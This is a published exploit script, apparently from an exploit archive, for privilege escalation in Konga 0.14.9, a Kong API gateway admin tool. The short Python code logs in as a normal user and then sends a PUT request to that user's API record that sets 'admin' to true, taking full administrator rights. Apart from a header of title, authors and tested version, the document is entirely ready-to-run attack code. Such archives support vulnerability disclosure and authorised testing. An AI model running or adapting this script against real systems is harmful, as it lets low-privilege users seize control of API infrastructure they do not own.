# Exploit Title: KONGA 0.14.9 - Privilege Escalation # Date: 10/11/2021 # Exploit Author: Fabricio Salomao & Paulo Trindade (@paulotrindadec) # Vendor Homepage: https://github.com/pantsel/konga # Software Link: https://github.com/pantsel/konga/archive/refs/tags/0.14.9.zip # Version: 0.14.9 # Tested on: Linux - Ubuntu 20.04.3 LTS (focal) import requests import json urlkonga = "http://www.example.com:1337/" # change to your konga address identifier = "usernormalkonga" # change user password = "changeme" # change password headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Content-Type": "application/json;charset=utf-8", "connection-id": "", "Origin": urlkonga, "Referer": urlkonga } url = urlkonga+"login" data = { "identifier":identifier, "password":password } response = requests.post(url, json=data) json_object = json.loads(response.text) print("[+] Attack") print("[+] Token " + json_object["token"]) url2 = urlkonga+"api/user/"+str(json_object["user"]["id"]) id = json_object["user"]["id"] print("[+] Exploiting User ID "+str(json_object["user"]["id"])) data2 = { "admin": "true", "passports": { "password": password, "protocol": "local" }, "password_confirmation": password, "token":json_object["token"] } print("[+] Change Normal User to Admin") response2 = requests.put(url2, headers=headers, json=data2) print("[+] Success")